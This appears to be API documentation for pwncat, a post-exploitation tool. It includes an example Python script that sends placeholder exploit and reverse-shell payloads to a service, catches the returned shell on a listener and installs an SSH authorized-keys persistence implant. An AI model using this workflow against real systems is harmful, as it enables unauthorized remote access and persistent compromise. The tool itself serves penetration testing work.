pwncat provides a high-level API capable of being used not only while implementing custom commands and modules but also to embed pwncat within scripts. pwncat can be instantiated from a script and you can interact with targets programmatically.
As an example, the following script demonstrates a fake exploit. In this example,
there is a public service listening on port
1337. We connect to this service,
send an exploit and a payload instructing the service to connect back to our
attacking machine with a shell. We also start a listener before sending the
exploit. After the exploit has been sent, we accept a connection to the listener,
and construct a pwncat manager and session around this connected socket.
Because we can harness the full internal pwncat API, we are even able to execute modules prior to entering the pwncat prompt. Below, we install the authorized keys implant prior to starting our shell.
#!/usr/bin/env python3 import socket import pwncat.manager # Connect to a vulnerable service sock = socket.create_connect(("192.168.1.1", 1337)) # Create the listener for our shell listener = socket.create_server(("0.0.0.0", 4444)) # Send the exploit and payload sock.send("EXPLOITEXPLOITEXPLOIT") sock.send("REVERSE SHELL PAYLOAD") # Accept the reverse connection victim, victim_addr = listener.accept() with pwncat.manager.Manager() as manager: # Establish a pwncat session session = manager.create_session(platform="linux", protocol="socket", client=victim) # Maybe install persistence or whatever session.run("implant.authorized_key", key="/home/caleb/.ssh/id_rsa") # Give the user a pwncat prompt manager.interactive()
Compatability with Text UI Libraries¶
python-rich to support colorful and aesthetically
pleasing output. However, this output does not behave well when using external Text UI
ncurses). One notable example is
pwntools which you likely use
when writing binary exploits. Because of this, prior to creating a manager, you should
shutdown any TUI libraries you may have loaded.
pwntools specifically does not provide a way to undo the changes it makes to the stdout/stdin. Because of this, when creating a manager, pwncat will automatically undo the things that pwntools did to change the terminal. You should close any existing pwntools progress instances and not use any output functionality from pwntools after instantiating a manager.
Modules and Packages¶
- pwncat.channel package
- pwncat.commands package
- pwncat.facts package
- pwncat.modules package
- pwncat.platform package
- pwncat.config module
- pwncat.db module
- pwncat.gtfobins module
- pwncat.manager module
- pwncat.subprocess module
- pwncat.target module
- pwncat.util module